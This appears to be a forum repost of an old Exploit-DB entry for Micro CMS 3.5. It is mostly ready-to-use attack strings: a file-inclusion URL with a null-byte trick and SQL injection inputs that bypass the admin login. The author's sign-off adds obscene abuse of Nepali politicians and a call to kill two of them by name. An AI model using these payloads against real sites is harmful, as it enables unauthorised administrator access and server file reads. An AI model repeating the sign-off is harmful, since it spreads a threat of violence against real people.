- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9699
- Проверка EDB
-
- Пройдено
- Автор
- LEARN3R HACKER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-09-16
Код:
#################################################
# Micro CMS File inclusion Vuln #
# Micro CMS SQLi login bypass #
# By learn3r hacker from Nepal #
# damagicalhacker@gmail.com #
#################################################
Affected version: v 3.5 or may be lower...
#############################################
# File Inclusion Vuln #
#############################################
Requires register globals to be on...
Vuln file: microcms-inlude.php
http://localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=[FileInclusion]%00
#############################################
# SQLi Login Bypass #
#############################################
Vuln file: microcms-admin-login.php
Username: valid_username/* [eg. admin/*]
Password: learn3r [or whatever]
Or Username: " or 1=1/*
Password: learn3r [or whatever]
Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Upendra Yadav and Vijay Gachhedhaar
By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!
# milw0rm.com [2009-09-16]- Источник
- www.exploit-db.com
